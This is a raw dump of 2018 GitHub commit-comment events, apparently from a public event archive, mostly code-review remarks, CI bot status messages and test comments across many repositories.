{"id":"7942905205","type":"CommitCommentEvent","actor":{"login":"rosscado"},"repo":{"name":"rosscado/sample-cloud-native-toolchain-tutorial-20180629133344888"},"payload":{"comment":{"id":29654243,"position":null,"line":null,"path":null,"commit_id":"8eb826a771530d5497d4fe87f1b4448abe677137","created_at":"2018-07-10T10:31:16Z","updated_at":"2018-07-10T10:31:16Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/1247f01c-bedc-4b1d-b07f-4a2fec5865a7?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180629133344888\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/9ea8d3b8-5d78-4284-8c83-9db4a53f12a1?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180629133344888\") deployed [sample-cloud-native-toolchain-tutorial-20180629133344888](https://github.com/rosscado/sample-cloud-native-toolchain-tutorial-20180629133344888/releases/tag/deploy-ibm-yp-eu-gb-deep-language-technology-prod-20180710-103114 \"deploy-ibm-yp-eu-gb-deep-language-technology-prod-20180710-103114\") to [prod](https://console.bluemix.net/apps/e3b3c755-21fb-45e8-b0b2-073dc570206a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:deep-language-technology:prod\"), including this commit"}},"created_at":"2018-07-10T10:31:16Z"}
{"id":"7942909410","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29654252,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-10T10:32:06Z","updated_at":"2018-07-10T10:32:06Z","author_association":"OWNER","body":"\r\n{ENTER}\r\n[f10072018103154_download.txt](https://github.com/githubuserdlp/TEST/files/2179960/f10072018103154_download.txt)\r\n"}},"created_at":"2018-07-10T10:32:06Z"}
{"id":"7942912165","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29654255,"position":37,"line":50,"path":"sys/utils.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:32:40Z","updated_at":"2018-07-10T10:32:40Z","author_association":"OWNER","body":"At some point we should do a debug channel system, but in the interim, perhaps we should provide a debug prefix as the first argument to the self:Debug() method, and then each chunk can define its own local Debug to call it. Ex:\r\n\r\nlocal Debug = function (msg, ...) Vendor:Debug(\"Rules\", msg, ...) end"}},"created_at":"2018-07-10T10:32:40Z"}
{"id":"7942917152","type":"CommitCommentEvent","actor":{"login":"spookykidmm"},"repo":{"name":"StevenBlack/hosts"},"payload":{"comment":{"id":29654263,"position":null,"line":null,"path":null,"commit_id":"8a1a4ad77faa001786f2b3434b0307d5acdd93c7","created_at":"2018-07-10T10:33:44Z","updated_at":"2018-07-10T10:33:44Z","author_association":"NONE","body":"@vascosrvbr My guess would be the crypto mining"}},"created_at":"2018-07-10T10:33:44Z"}
{"id":"7942917725","type":"CommitCommentEvent","actor":{"login":"Engineer2Designer"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29654265,"position":null,"line":null,"path":null,"commit_id":"1e0d58222d278d0ef29c6bae1ef4a3e9131ea690","created_at":"2018-07-10T10:33:52Z","updated_at":"2018-07-10T10:33:52Z","author_association":"CONTRIBUTOR","body":"WHY"}},"created_at":"2018-07-10T10:33:52Z"}
{"id":"7942917797","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29654266,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-10T10:33:53Z","updated_at":"2018-07-10T10:33:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T10:33:53Z"}
{"id":"7942919740","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29654273,"position":16,"line":16,"path":"Formula/carthage.rb","commit_id":"f74d9ba598c9843552450abeb382cacd0e71d4c0","created_at":"2018-07-10T10:34:17Z","updated_at":"2018-07-10T10:34:17Z","author_association":"MEMBER","body":"`brew upgrade` continues passed that despite printing the error."}},"created_at":"2018-07-10T10:34:17Z"}
{"id":"7942920732","type":"CommitCommentEvent","actor":{"login":"xavysp"},"repo":{"name":"xavysp/multispectral_demosaicing"},"payload":{"comment":{"id":29654281,"position":null,"line":null,"path":null,"commit_id":"7ecc13b8b289d54abea293086f370839a61f3e7a","created_at":"2018-07-10T10:34:30Z","updated_at":"2018-07-10T10:34:30Z","author_association":"OWNER","body":"Hi sure, \r\nand sorry, by the way, I was in other projects :)"}},"created_at":"2018-07-10T10:34:30Z"}
{"id":"7942920783","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29654282,"position":28,"line":30,"path":"ui/config.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:34:30Z","updated_at":"2018-07-10T10:34:30Z","author_association":"OWNER","body":"misspelled \"unknownappearance\""}},"created_at":"2018-07-10T10:34:30Z"}
{"id":"7942922889","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29654283,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-10T10:34:57Z","updated_at":"2018-07-10T10:34:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T10:34:57Z"}
{"id":"7942928319","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29654309,"position":34,"line":36,"path":"ui/config.lua","commit_id":"14dae3166636f84ef92f9845bbc61ef6b7112b20","created_at":"2018-07-10T10:36:07Z","updated_at":"2018-07-10T10:36:07Z","author_association":"OWNER","body":"should set to 190 ilvl as the default so it doesn't vendor all the player's gear on 8.0.1 :)\r\n"}},"created_at":"2018-07-10T10:36:07Z"}
{"id":"7942932003","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/attila-m"},"payload":{"comment":{"id":29654316,"position":1,"line":1,"path":"week-08/day-04/stackertrace/finder/.gradle/buildOutputCleanup/cache.properties.lock","commit_id":"7d49fd55d03352115dcb0a769ed7d5d12952bd20","created_at":"2018-07-10T10:36:52Z","updated_at":"2018-07-10T10:36:52Z","author_association":"NONE","body":"Oh a lock file :( it seems something is missing from your `.gitignore`"}},"created_at":"2018-07-10T10:36:52Z"}
{"id":"7942933452","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"davidhalter/parso"},"payload":{"comment":{"id":29654319,"position":null,"line":null,"path":null,"commit_id":"e6bc924fbabbfa3090044e475c91a7655b9c6e9b","created_at":"2018-07-10T10:37:12Z","updated_at":"2018-07-10T10:37:12Z","author_association":"CONTRIBUTOR","body":"This commit does not appear to be in master."}},"created_at":"2018-07-10T10:37:12Z"}
{"id":"7942933489","type":"CommitCommentEvent","actor":{"login":"Awzaw"},"repo":{"name":"Teamblocket/PCFly"},"payload":{"comment":{"id":29654320,"position":null,"line":null,"path":null,"commit_id":"cc4dc26ed5b2009bf11288b612aab34db6282877","created_at":"2018-07-10T10:37:12Z","updated_at":"2018-07-10T10:37:12Z","author_association":"NONE","body":"This also means that those who are not OP can't use the command, even if they do have the permission"}},"created_at":"2018-07-10T10:37:12Z"}
{"id":"7942933775","type":"CommitCommentEvent","actor":{"login":"rsandell"},"repo":{"name":"jenkinsci/gerrit-trigger-plugin"},"payload":{"comment":{"id":29654322,"position":65,"line":65,"path":"src/test/java/com/sonyericsson/hudson/plugins/gerrit/trigger/gerritnotifier/model/BuildMemoryReportContainerTest.java","commit_id":"5198d89516668ffad80800cf067d8a6b8f3aab16","created_at":"2018-07-10T10:37:15Z","updated_at":"2018-07-10T10:37:15Z","author_association":"MEMBER","body":"I don't expect this to be true. Since they have the same hashcode they are essentially the same event."}},"created_at":"2018-07-10T10:37:15Z"}
{"id":"7942935693","type":"CommitCommentEvent","actor":{"login":"jmannionfx"},"repo":{"name":"jmannionfx/taekwondomomentum.github.io"},"payload":{"comment":{"id":29654329,"position":null,"line":null,"path":null,"commit_id":"39f0e97ed29fb6201219aac3578ac52e3541575b","created_at":"2018-07-10T10:37:40Z","updated_at":"2018-07-10T10:37:40Z","author_association":"OWNER","body":"Deleted "}},"created_at":"2018-07-10T10:37:40Z"}
{"id":"7942946236","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29654340,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-10T10:40:00Z","updated_at":"2018-07-10T10:40:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T10:40:00Z"}
{"id":"7942946448","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/attila-m"},"payload":{"comment":{"id":29654341,"position":11,"line":11,"path":"week-08/day-04/stackertrace/finder/src/main/java/com/greenfox/error/service/UserService.java","commit_id":"7d49fd55d03352115dcb0a769ed7d5d12952bd20","created_at":"2018-07-10T10:40:03Z","updated_at":"2018-07-10T10:40:03Z","author_association":"NONE","body":"I think you experienced some data loss between get requests. I would make this array static as an IOC workaround or use a inmemory(h2) database"}},"created_at":"2018-07-10T10:40:03Z"}
{"id":"7942946459","type":"CommitCommentEvent","actor":{"login":"fimaua"},"repo":{"name":"fimaua/Test-Project"},"payload":{"comment":{"id":29654342,"position":null,"line":null,"path":null,"commit_id":"fb1a60b4acec417a7bbec6d8135cea2a04db6a6f","created_at":"2018-07-10T10:40:03Z","updated_at":"2018-07-10T10:40:03Z","author_association":"OWNER","body":"Создаем файл, записываем в файл, добавляем в файл и читаем его"}},"created_at":"2018-07-10T10:40:03Z"}
{"id":"7942949360","type":"CommitCommentEvent","actor":{"login":"StrikerYU"},"repo":{"name":"StrikerYU/test"},"payload":{"comment":{"id":29654345,"position":3,"line":3,"path":"README.md","commit_id":"45c1df28dc4a9d24e741aa9cb49ede172bcabdcb","created_at":"2018-07-10T10:40:40Z","updated_at":"2018-07-10T10:40:40Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-10T10:40:40Z"}
{"id":"7942949937","type":"CommitCommentEvent","actor":{"login":"StrikerYU"},"repo":{"name":"StrikerYU/test"},"payload":{"comment":{"id":29654349,"position":4,"line":4,"path":"README.md","commit_id":"45c1df28dc4a9d24e741aa9cb49ede172bcabdcb","created_at":"2018-07-10T10:40:48Z","updated_at":"2018-07-10T10:40:48Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-10T10:40:48Z"}
{"id":"7942953589","type":"CommitCommentEvent","actor":{"login":"a87796949"},"repo":{"name":"a87796949/wanghongqingSB"},"payload":{"comment":{"id":29654355,"position":null,"line":null,"path":null,"commit_id":"499636a9c5c79d605d995309f2d4dc2f8bb2afe0","created_at":"2018-07-10T10:41:36Z","updated_at":"2018-07-10T10:41:36Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-10T10:41:36Z"}
{"id":"7942955134","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/nikidobos"},"payload":{"comment":{"id":29654359,"position":68,"line":65,"path":"week-08/day-02/List Todos/List Todos/Controllers/TodoController.cs","commit_id":"b18bc2467f83417abd03990cdaabea5772461506","created_at":"2018-07-10T10:41:55Z","updated_at":"2018-07-10T10:41:55Z","author_association":"NONE","body":"why did you delete this? if you instantie to your service layer, it will work fine :)"}},"created_at":"2018-07-10T10:41:55Z"}
{"id":"7942957337","type":"CommitCommentEvent","actor":{"login":"Kryklyvenko"},"repo":{"name":"gderiyenko/boat24"},"payload":{"comment":{"id":29654363,"position":null,"line":null,"path":null,"commit_id":"67e17c072152a753cd6e7e84fc6a0fb0440e3cec","created_at":"2018-07-10T10:42:24Z","updated_at":"2018-07-10T10:42:24Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [3. Left corner LWG logo- Logo must me little bit bigger.](https://trello.com/c/0BxDOKOX/3-3-left-corner-lwg-logo-logo-must-me-little-bit-bigger)"}},"created_at":"2018-07-10T10:42:24Z"}
{"id":"7942960357","type":"CommitCommentEvent","actor":{"login":"markjd84"},"repo":{"name":"IntegratedTransportPlanning/gcvt"},"payload":{"comment":{"id":29654369,"position":null,"line":null,"path":null,"commit_id":"782401f9650a9ce0045c05a4bdf5454d32a463b6","created_at":"2018-07-10T10:43:03Z","updated_at":"2018-07-10T10:43:03Z","author_association":"CONTRIBUTOR","body":"For this to work it needs a minor addition to your Leaflet plugin fork, @cmcaine \r\n\r\nCan push this whenever, just want to check first"}},"created_at":"2018-07-10T10:43:03Z"}
{"id":"7942961261","type":"CommitCommentEvent","actor":{"login":"baffioso"},"repo":{"name":"ballerupgis/bilreg"},"payload":{"comment":{"id":29654371,"position":null,"line":null,"path":null,"commit_id":"a4b4cd9183969814bd294e0b2f62d0a9fb885bc7","created_at":"2018-07-10T10:43:14Z","updated_at":"2018-07-10T10:43:14Z","author_association":"MEMBER","body":"@nixen97 har ændret i baseurl, så den nu indeholder bilreg brugeren."}},"created_at":"2018-07-10T10:43:14Z"}
{"id":"7942963527","type":"CommitCommentEvent","actor":{"login":"PengJi"},"repo":{"name":"PengJi/c-prac"},"payload":{"comment":{"id":29654376,"position":null,"line":null,"path":null,"commit_id":"a47cc90ce1e372e046c7809d5abe20d728f17df1","created_at":"2018-07-10T10:43:44Z","updated_at":"2018-07-10T10:43:44Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-10T10:43:44Z"}
{"id":"7942964136","type":"CommitCommentEvent","actor":{"login":"twstokes"},"repo":{"name":"twstokes/door_detect"},"payload":{"comment":{"id":29654377,"position":null,"line":null,"path":null,"commit_id":"23a2f3026000163e159fba4d9e10fb2ac535e570","created_at":"2018-07-10T10:43:51Z","updated_at":"2018-07-10T10:43:51Z","author_association":"OWNER","body":"I've pushed some code that will hopefully help you: https://github.com/twstokes/door_detect/commit/ae45e95bf8db450a4e223f26f64b17a37ea90839\r\n\r\nFeel free to ask any questions!"}},"created_at":"2018-07-10T10:43:51Z"}
{"id":"7942964945","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/nikidobos"},"payload":{"comment":{"id":29654381,"position":null,"line":null,"path":null,"commit_id":"26fd3bbb3c2fa4509e876acfe9377a2ea3867db8","created_at":"2018-07-10T10:44:01Z","updated_at":"2018-07-10T10:44:01Z","author_association":"NONE","body":"commit message: it is not a feature, i would use \"style\" for that :)\r\n\r\nAllowed <type>\r\nfeat (feature)\r\nfix (bug fix)\r\ndocs (documentation)\r\nstyle (formatting, missing semi colons, …)\r\nrefactor\r\ntest (when adding missing tests)\r\nchore (maintain)"}},"created_at":"2018-07-10T10:44:01Z"}
{"id":"7942966287","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29654382,"position":null,"line":null,"path":null,"commit_id":"491596da5390357aca35764e366db38a17de2291","created_at":"2018-07-10T10:44:18Z","updated_at":"2018-07-10T10:44:18Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-10T10:44:18Z"}
{"id":"7942969758","type":"CommitCommentEvent","actor":{"login":"TIGERFLYINGUPONTHERIVER"},"repo":{"name":"TIGERFLYINGUPONTHERIVER/fllop"},"payload":{"comment":{"id":29654394,"position":null,"line":null,"path":null,"commit_id":"411025deffbd69eb9171cd0b4b9f800e07483027","created_at":"2018-07-10T10:45:03Z","updated_at":"2018-07-10T10:45:03Z","author_association":"OWNER","body":"数据缓存"}},"created_at":"2018-07-10T10:45:03Z"}
{"id":"7942971331","type":"CommitCommentEvent","actor":{"login":"Sampath5581"},"repo":{"name":"Sampath5581/SamplePro"},"payload":{"comment":{"id":29654403,"position":5,"line":6,"path":"src/org/sampath/MainClass.java","commit_id":"709337220bf5c7fad609937f3cf24429273af532","created_at":"2018-07-10T10:45:23Z","updated_at":"2018-07-10T10:45:23Z","author_association":"OWNER","body":"Adding comment"}},"created_at":"2018-07-10T10:45:23Z"}
{"id":"7942972318","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29654408,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-10T10:45:36Z","updated_at":"2018-07-10T10:45:36Z","author_association":"CONTRIBUTOR","body":"For reference: this issue has now been filed under https://bugs.php.net/76600 (thanks!)\r\n\r\n> In my opinion we should treat the hash extension like date and always enforce it (same also for openssl imo) having such security-related features should be a key feature users can rely upon in 2018.\r\n\r\nIMO, that should be discussed on internals@ and might need an RFC."}},"created_at":"2018-07-10T10:45:36Z"}
{"id":"7942973706","type":"CommitCommentEvent","actor":{"login":"besartkr"},"repo":{"name":"besartkr/firstCommit"},"payload":{"comment":{"id":29654411,"position":null,"line":null,"path":null,"commit_id":"96b26472abe27b9b21f42163b0546f0a9a4de2f5","created_at":"2018-07-10T10:45:55Z","updated_at":"2018-07-10T10:45:55Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-10T10:45:55Z"}
{"id":"7942974549","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/nikidobos"},"payload":{"comment":{"id":29654415,"position":7,"line":10,"path":"week-08/day-02/List Todos/List Todos/Controllers/TodoController.cs","commit_id":"b18bc2467f83417abd03990cdaabea5772461506","created_at":"2018-07-10T10:46:07Z","updated_at":"2018-07-10T10:46:07Z","author_association":"NONE","body":"dat némszpész 😿 pls 😿 "}},"created_at":"2018-07-10T10:46:07Z"}
{"id":"7942976964","type":"CommitCommentEvent","actor":{"login":"gusc"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29654423,"position":16,"line":16,"path":"Formula/carthage.rb","commit_id":"f74d9ba598c9843552450abeb382cacd0e71d4c0","created_at":"2018-07-10T10:46:37Z","updated_at":"2018-07-10T10:46:37Z","author_association":"NONE","body":"I'm running these upgrades using Ansible and as the upgrade sets return code to 1 after this error, Ansible treats this as a complete failure. Shouldn't the `depends_on :macos => :sierra` prevent this formula to be proposed as an upgrade at all?"}},"created_at":"2018-07-10T10:46:37Z"}
{"id":"7942980539","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29654440,"position":8,"line":132,"path":"webapp/src/main/java/education/web/platform/controllers/user/CourseController.java","commit_id":"4891a641dc7e869592787e441b8aad9ac8f2fbb2","created_at":"2018-07-10T10:47:26Z","updated_at":"2018-07-10T10:47:26Z","author_association":"CONTRIBUTOR","body":"переменную надо переименовать в courseId - это же id курса а не юзер курса"}},"created_at":"2018-07-10T10:47:26Z"}
{"id":"7942982324","type":"CommitCommentEvent","actor":{"login":"bellingard"},"repo":{"name":"bellingard/sonar-scanner-npm"},"payload":{"comment":{"id":29654443,"position":null,"line":null,"path":null,"commit_id":"52818665f355806766158fd5836bb21d525627e2","created_at":"2018-07-10T10:47:50Z","updated_at":"2018-07-10T10:47:50Z","author_association":"OWNER","body":"This fixed #42 ."}},"created_at":"2018-07-10T10:47:50Z"}
{"id":"7942982451","type":"CommitCommentEvent","actor":{"login":"RahulSharma2309"},"repo":{"name":"ksushilmaurya/enukeAssignment"},"payload":{"comment":{"id":29654444,"position":null,"line":null,"path":null,"commit_id":"5fe380e4ec580beb6845f42d474577139baa2a3e","created_at":"2018-07-10T10:47:52Z","updated_at":"2018-07-10T10:47:52Z","author_association":"NONE","body":"Hi brother ...can i get in contact with you by any mean to understand the logic\r\n"}},"created_at":"2018-07-10T10:47:52Z"}
{"id":"7942987075","type":"CommitCommentEvent","actor":{"login":"fimaua"},"repo":{"name":"fimaua/Test-Project"},"payload":{"comment":{"id":29654454,"position":null,"line":null,"path":null,"commit_id":"90b81273aee5f1610bda59959c2bc77505e669cc","created_at":"2018-07-10T10:48:56Z","updated_at":"2018-07-10T10:48:56Z","author_association":"OWNER","body":"Readme"}},"created_at":"2018-07-10T10:48:56Z"}
{"id":"7942988150","type":"CommitCommentEvent","actor":{"login":"Sorokinsta"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":29654457,"position":14,"line":136,"path":"webapp/src/main/java/education/web/platform/controllers/user/CourseController.java","commit_id":"4891a641dc7e869592787e441b8aad9ac8f2fbb2","created_at":"2018-07-10T10:49:10Z","updated_at":"2018-07-10T10:49:10Z","author_association":"CONTRIBUTOR","body":"зачем доставать все StudentCourse и фильтровать,  когда можно просто достать один используя id курса и id студента? \r\nнапиши один запрос . достань нужный"}},"created_at":"2018-07-10T10:49:10Z"}
{"id":"7942993608","type":"CommitCommentEvent","actor":{"login":"tig-robertgrundeken"},"repo":{"name":"tig-nl/buckaroo-magento2"},"payload":{"comment":{"id":29654470,"position":null,"line":null,"path":null,"commit_id":"9b09b167add0be111bd6571b0cadc13d462b185c","created_at":"2018-07-10T10:50:20Z","updated_at":"2018-07-10T10:50:20Z","author_association":"CONTRIBUTOR","body":"@ArjenMiedema thanks for pointing this out. We are using this field also to show the version in the configuration. But I think for this case it will be better if we change the .xsd and add an other attribute for just the version of the extension."}},"created_at":"2018-07-10T10:50:20Z"}
{"id":"7942994187","type":"CommitCommentEvent","actor":{"login":"jbbr"},"repo":{"name":"nuwave/lighthouse"},"payload":{"comment":{"id":29654474,"position":8,"line":8,"path":"assets/default-schema.graphql","commit_id":"c90df6ac587c6269fafa4a4b056fc0f261ec9b8d","created_at":"2018-07-10T10:50:27Z","updated_at":"2018-07-10T10:50:27Z","author_association":"NONE","body":"Thank you for the explanation. Makes sense to me. \r\n\r\nNative required types are nice to have when using editors with graphql schema support. Or when using introspection/graphiql. This makes writing queries and mutations easier as it's always visible which fields are required.\r\n\r\nHowever I'm not sure if it would be \"correct\" to combine GraphQL schema errors with Laravel validation. Feels wrong to me but would indeed make consuming errors easier."}},"created_at":"2018-07-10T10:50:27Z"}
{"id":"7942996681","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29654481,"position":15,"line":84,"path":"src/main/java/movierent/controller/MovieController.java","commit_id":"4742eda554c59a0a3621b0ed742e66e0d94d2f6d","created_at":"2018-07-10T10:51:00Z","updated_at":"2018-07-10T10:51:00Z","author_association":"NONE","body":"Should the user role be authenticated before a movie is deleted?\r\nCan't anyone just call this url without being loged in as admin?"}},"created_at":"2018-07-10T10:51:00Z"}
{"id":"7942997748","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29654484,"position":13,"line":82,"path":"src/main/java/movierent/controller/MovieController.java","commit_id":"4742eda554c59a0a3621b0ed742e66e0d94d2f6d","created_at":"2018-07-10T10:51:14Z","updated_at":"2018-07-10T10:51:14Z","author_association":"NONE","body":"This should not be a get method"}},"created_at":"2018-07-10T10:51:14Z"}
{"id":"7942999502","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29654488,"position":20,"line":89,"path":"src/main/java/movierent/controller/MovieController.java","commit_id":"4742eda554c59a0a3621b0ed742e66e0d94d2f6d","created_at":"2018-07-10T10:51:36Z","updated_at":"2018-07-10T10:51:36Z","author_association":"NONE","body":"again - not a GET"}},"created_at":"2018-07-10T10:51:36Z"}
{"id":"7943000950","type":"CommitCommentEvent","actor":{"login":"Liebeck"},"repo":{"name":"explosion/spaCy"},"payload":{"comment":{"id":29654491,"position":311,"line":22036,"path":"spacy/lang/de/lemmatizer.py","commit_id":"00b9a585580bbe7c0e26dc2043625275fb73bac3","created_at":"2018-07-10T10:51:54Z","updated_at":"2018-07-10T10:51:54Z","author_association":"NONE","body":"Shouldn't the lemma be upper-cased as well? What is the convention here? _Entschuldigungen_ maps to _Entschuldigung_ in upper-case"}},"created_at":"2018-07-10T10:51:54Z"}
{"id":"7943002005","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29654494,"position":16,"line":16,"path":"Formula/carthage.rb","commit_id":"f74d9ba598c9843552450abeb382cacd0e71d4c0","created_at":"2018-07-10T10:52:09Z","updated_at":"2018-07-10T10:52:09Z","author_association":"MEMBER","body":"The resolution is to `brew uninstall carthage` or to `brew pin carthage` and to use `brew upgrade --ignore-pinned`.\r\n\r\n`depends_on :macos => :sierra` would be redundant and would not alter the situation."}},"created_at":"2018-07-10T10:52:09Z"}
{"id":"7943003817","type":"CommitCommentEvent","actor":{"login":"Liebeck"},"repo":{"name":"explosion/spaCy"},"payload":{"comment":{"id":29654502,"position":752,"line":52247,"path":"spacy/lang/de/lemmatizer.py","commit_id":"00b9a585580bbe7c0e26dc2043625275fb73bac3","created_at":"2018-07-10T10:52:31Z","updated_at":"2018-07-10T10:52:31Z","author_association":"NONE","body":"Typo"}},"created_at":"2018-07-10T10:52:31Z"}
{"id":"7943004364","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/nikidobos"},"payload":{"comment":{"id":29654506,"position":7,"line":62,"path":"week-08/day-02/List Todos/List Todos/Repositories/TodoRepository.cs","commit_id":"d13f545ed658a09c9d845f28b8f02662ab25a2cc","created_at":"2018-07-10T10:52:40Z","updated_at":"2018-07-10T10:52:40Z","author_association":"NONE","body":"what if search box is \"null\"? ( CRASH 🗡 )"}},"created_at":"2018-07-10T10:52:40Z"}
{"id":"7943004426","type":"CommitCommentEvent","actor":{"login":"yanmarkman"},"repo":{"name":"MISL-EBU-System-SW/mainline-public"},"payload":{"comment":{"id":29654507,"position":6,"line":112,"path":"drivers/net/ethernet/marvell/mvpp2/mvpp2_cls.c","commit_id":"0d6826f0de18bb05a8976a1aec474c25848805b7","created_at":"2018-07-10T10:52:40Z","updated_at":"2018-07-10T10:52:40Z","author_association":"NONE","body":"There should be num_online_cpus() but not _present_cpus()"}},"created_at":"2018-07-10T10:52:40Z"}
{"id":"7943007247","type":"CommitCommentEvent","actor":{"login":"VadimZavgorodny"},"repo":{"name":"Gandalf1605/NewRepo2"},"payload":{"comment":{"id":29654511,"position":78,"line":76,"path":"index.php","commit_id":"fabf114c61879dd071dab877ea7a96b3df9a6ac9","created_at":"2018-07-10T10:53:16Z","updated_at":"2018-07-10T10:53:16Z","author_association":"COLLABORATOR","body":"Не нужно так инициализировать пустую переменную.\r\nhttps://stackoverflow.com/questions/30955639/is-it-necessary-to-initialize-declare-variable-in-php"}},"created_at":"2018-07-10T10:53:16Z"}
{"id":"7943007691","type":"CommitCommentEvent","actor":{"login":"ddonchev"},"repo":{"name":"IvankaTashkova/MovieRent"},"payload":{"comment":{"id":29654512,"position":27,"line":96,"path":"src/main/java/movierent/controller/MovieController.java","commit_id":"4742eda554c59a0a3621b0ed742e66e0d94d2f6d","created_at":"2018-07-10T10:53:22Z","updated_at":"2018-07-10T10:53:22Z","author_association":"NONE","body":"some code is duplicated with add to favs and other methods. You should reuse"}},"created_at":"2018-07-10T10:53:22Z"}
